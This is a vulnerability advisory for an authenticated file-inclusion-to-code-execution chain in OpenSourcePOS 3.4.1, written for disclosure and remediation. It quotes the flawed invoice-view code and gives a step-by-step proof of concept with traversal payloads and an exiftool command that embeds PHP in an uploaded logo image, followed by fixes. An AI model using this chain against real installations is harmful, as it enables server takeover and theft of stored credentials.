# CVE-2026-26746 - LFI to Remote Code Execution in OpenSourcePOS

**Date:** 2026-02-20  
**CVE ID:** CVE-2026-26746  
**Vulnerability Type:** Local File Inclusion (LFI) / Directory Traversal (CWE-22)  
**Affected Product:** OpenSourcePOS  
**Affected Version:** 3.4.1  
**Affected Component:** Sales Module / Configuration  
**Impact:** Remote Code Execution (RCE), Sensitive Data Exposure  

---

## 1. Executive Summary
A critical vulnerability exists in **OpenSourcePOS 3.4.1** that allows an authenticated attacker to perform **Local File Inclusion (LFI)**. By manipulating the `invoice_type` configuration setting, an attacker can traverse directories and include arbitrary files on the server. 

When combined with the application's file upload functionality (e.g., Company Logo upload), this vulnerability can be escalated to **Remote Code Execution (RCE)** by including a malicious image containing embedded PHP code.

---

## 2. Technical Analysis
The vulnerability resides in the `Sales.php::getInvoice()` function. The application retrieves the `invoice_view` value from the database (which is set via the user-controlled Configuration menu) and passes it directly to the `view()` function without sanitization.

### Vulnerable Code Snippet:
File: `app/Controllers/Sales.php`

```php
public function getInvoice(int $sale_id): void
{
    $data = $this->_load_sale_data($sale_id);

    // VULNERABILITY: User-controlled $data['invoice_view'] is concatenated into the path
    echo view('sales/' . $data['invoice_view'], $data); 
    
    $this->sale_lib->clear_all();
}
```

Since the application does not validate if the `$data['invoice_view']` remains within the `views/sales/` directory, an attacker can use `../` sequences to point to any file on the filesystem.

---

## 3. Proof of Concept (PoC)

### Step 1: Inject path traversal payload via Invoice Type

Log in and navigate to **Configuration → Invoice**, then change the **Invoice Type** value.
<img width="1914" height="928" alt="image" src="https://github.com/user-attachments/assets/bb81ac84-25cb-4d7a-999f-60bf0233e727" />

Intercept the request and modify the `invoice_type` parameter to:

```
../../../.env
```

<img width="1916" height="841" alt="image" src="https://github.com/user-attachments/assets/e0297680-6cc9-43bc-bc80-e066ef6e4525" />

This payload is stored in the application configuration.

---

### Step 2: Trigger Local File Inclusion

Navigate to **Sales** and create a new **Invoice**.  
<img width="1918" height="799" alt="image" src="https://github.com/user-attachments/assets/163ce0c9-ba1c-4054-a3b4-03146c4b02a5" />
When clicking **Invoice**, the application loads the configured `invoice_type` value, causing the `.env` file to be included and displayed.
<img width="1919" height="794" alt="image" src="https://github.com/user-attachments/assets/b2daa334-13c7-4a1c-8a71-b8c8b173a51b" />

---

### Step 3: Prepare a malicious file for RCE

Use `exiftool` to embed a PHP payload into an image file:

```
exiftool -Comment='<?php system("id"); ?>' images.jpg
```
<img width="1917" height="819" alt="image" src="https://github.com/user-attachments/assets/d4b62a88-b7a1-4ef1-88be-8c497af81364" />
Then upload this image to the server using the **Change Company Logo** functionality.
<img width="1532" height="801" alt="image" src="https://github.com/user-attachments/assets/a0e526a6-0921-481c-a13c-0cd2bc2f6d00" />

---

### Step 4: Achieve Remote Code Execution
After upload the image from step 3, change the `invoice_type` field in the configuration to `../../../../../app/public/uploads/images.jpg`
<img width="1919" height="870" alt="image" src="https://github.com/user-attachments/assets/444f5b7a-08a0-440f-b9a6-7a9241ad493e" />
Create an invoice again as in Step 2.  
When the invoice is rendered, the uploaded image is included and the embedded PHP payload is executed, returning the output of the `id` command.

<img width="1917" height="794" alt="image" src="https://github.com/user-attachments/assets/28551eb4-bd2f-4437-94ef-a094b8a679ca" />

---

## 4. Impact
* **System Compromise:** Full Remote Code Execution allows attackers to execute arbitrary system commands under the web server's user (`www-data`).
* **Data Breach:** Ability to read sensitive configuration files (`.env`).

---

## 5. Remediation
* **Input Validation:** Implement a strict whitelist for the `invoice_type` configuration. Only allow predefined template names (e.g., `invoice`, `receipt`).
* **Sanitization:** Use `basename()` to strip directory paths from user-supplied input.
* **Hardening:** * Disable execution of PHP in the `uploads` directory via `.htaccess` or Nginx configuration.
    * Ensure the web server user has minimal permissions on the filesystem.

---

## 6. References
* [OpenSourcePOS GitHub](https://github.com/opensourcepos/opensourcepos)
* [CWE-22: Improper Limitation of a Pathname to a Restricted Directory](https://cwe.mitre.org/data/definitions/22.html)

---
*Advisory created and reported by hungnqdz & phdwg1410*
